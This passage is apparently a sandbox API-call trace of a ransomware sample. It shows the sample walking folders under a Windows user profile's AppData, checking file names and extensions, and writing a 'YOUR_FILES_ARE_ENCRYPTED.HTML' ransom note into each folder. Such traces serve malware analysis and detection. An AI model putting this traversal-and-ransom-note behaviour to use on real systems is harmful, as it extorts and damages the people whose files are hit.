lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0170.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*" [0170.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.279] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.279] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0170.279] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 101 [0170.279] GetProcessHeap () returned 0x270000 [0170.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.279] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0170.279] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*" [0170.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.279] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.279] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0170.279] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0170.279] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.280] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0170.280] lstrlenW (lpString=".feed-ms") returned 8 [0170.280] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0170.280] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 0 [0170.280] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.280] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0170.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5cc [0170.280] WriteFile (in: hFile=0x5cc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.282] CloseHandle (hObject=0x5cc) returned 1 [0170.282] GetProcessHeap () returned 0x270000 [0170.283] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.283] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0170.283] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.283] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0170.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.284] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.299] CloseHandle (hObject=0x604) returned 1 [0170.300] GetProcessHeap () returned 0x270000 [0170.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.300] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", 
cAlternateFileName="{5588A~1")) returned 0 [0170.300] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.301] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.301] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.303] CloseHandle (hObject=0x5fc) returned 1 [0170.303] GetProcessHeap () returned 0x270000 [0170.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.304] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0170.304] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned 56 [0170.304] GetProcessHeap () returned 0x270000 [0170.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 
0x7759008 [0170.304] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache" [0170.304] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*" [0170.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.307] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.307] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="4CSSRV00", cAlternateFileName="")) returned 1 [0170.307] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned 65 [0170.307] GetProcessHeap () returned 0x270000 [0170.307] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.307] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" [0170.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*" [0170.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\desktop.ini") returned 77 [0170.308] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.308] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.308] lstrlenW (lpString=".ini") returned 4 [0170.308] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds 
Cache\\4CSSRV00\\fwlink[1]") returned 75 [0170.308] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.308] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.308] lstrlenW (lpString="") returned 0 [0170.308] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.308] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\4cssrv00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.309] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.311] CloseHandle (hObject=0x604) returned 1 [0170.311] GetProcessHeap () returned 0x270000 [0170.312] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 
[0170.312] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0170.312] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.312] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.312] lstrlenW (lpString=".ini") returned 4 [0170.312] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.312] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DT1GIE4D", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned 65 [0170.312] GetProcessHeap () returned 0x270000 [0170.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.312] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" | out: 
lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" [0170.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*" [0170.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.312] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.312] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
